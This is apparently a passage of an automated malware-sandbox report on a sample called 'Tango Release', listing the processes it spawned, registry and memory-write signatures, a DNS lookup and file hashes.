Command Line

cmd /c "C:\Users\Admin\AppData\Local\Temp\Tango Release\license.txt"

Signatures

Enumerates physical storage devices

Modifies registry class

Description Indicator Process Target
Key created \REGISTRY\USER\S-1-5-21-423582142-4191893794-1888535462-1000_Classes\Local Settings C:\Windows\system32\cmd.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 4008 wrote to memory of 1392 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\NOTEPAD.EXE
PID 4008 wrote to memory of 1392 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\NOTEPAD.EXE

Processes

C:\Windows\system32\cmd.exe

cmd /c "C:\Users\Admin\AppData\Local\Temp\Tango Release\license.txt"

C:\Windows\system32\NOTEPAD.EXE

"C:\Windows\system32\NOTEPAD.EXE" C:\Users\Admin\AppData\Local\Temp\Tango Release\license.txt

Network

Country Destination Domain Proto
US 8.8.8.8:53 8.8.8.8.in-addr.arpa udp

Files

N/A

Analysis: behavioral1

Detonation Overview

Submitted

2024-06-22 02:18

Reported

2024-06-22 02:21

Platform

win11-20240611-en

Max time kernel

145s

Max time network

151s

Command Line

cmd /c "C:\Users\Admin\AppData\Local\Temp\Tango Release.rar"

Signatures

Enumerates physical storage devices

Modifies registry class

Description Indicator Process Target
Key created \REGISTRY\USER\S-1-5-21-2198854727-3842442895-2838824242-1000_Classes\Local Settings\MuiCache C:\Windows\SystemApps\MicrosoftWindows.Client.CBS_cw5n1h2txyewy\MiniSearchHost.exe N/A
Key created \REGISTRY\USER\S-1-5-21-2198854727-3842442895-2838824242-1000_Classes\Local Settings C:\Windows\system32\cmd.exe N/A
Key created \REGISTRY\USER\S-1-5-21-2198854727-3842442895-2838824242-1000_Classes\Local Settings C:\Windows\system32\OpenWith.exe N/A

Suspicious use of SetWindowsHookEx

Description Indicator Process Target
N/A N/A C:\Windows\SystemApps\MicrosoftWindows.Client.CBS_cw5n1h2txyewy\MiniSearchHost.exe N/A
N/A N/A C:\Windows\system32\OpenWith.exe N/A

Processes

C:\Windows\system32\cmd.exe

cmd /c "C:\Users\Admin\AppData\Local\Temp\Tango Release.rar"

C:\Windows\SystemApps\MicrosoftWindows.Client.CBS_cw5n1h2txyewy\MiniSearchHost.exe

"C:\Windows\SystemApps\MicrosoftWindows.Client.CBS_cw5n1h2txyewy\MiniSearchHost.exe" -ServerName:MiniSearchUI.AppXj3y73at8fy1htwztzxs68sxx1v7cksp7.mca

C:\Windows\system32\OpenWith.exe

C:\Windows\system32\OpenWith.exe -Embedding

Network

Files

C:\Users\Admin\AppData\Local\Packages\MicrosoftWindows.Client.CBS_cw5n1h2txyewy\TempState\SearchHoverUnifiedTileModelCache.dat

MD5 a05de6626e878c11872bcf9a152a692c
SHA1 8e2e338228d149511acd9740a84d5310c33f7f2c
SHA256 2b028061471208157f927bc0495bd6814ebce7edb5c6a0cf5f6d8d065845d704
SHA512 9f73b10f2acb9d22d8c02428f55759d55c4a6d8f4521f2c8f698c7d20280aded26a3e2ecd565507d5e8334ba4843076fbc42e3df74b49a8bc20eeb71d9ceb520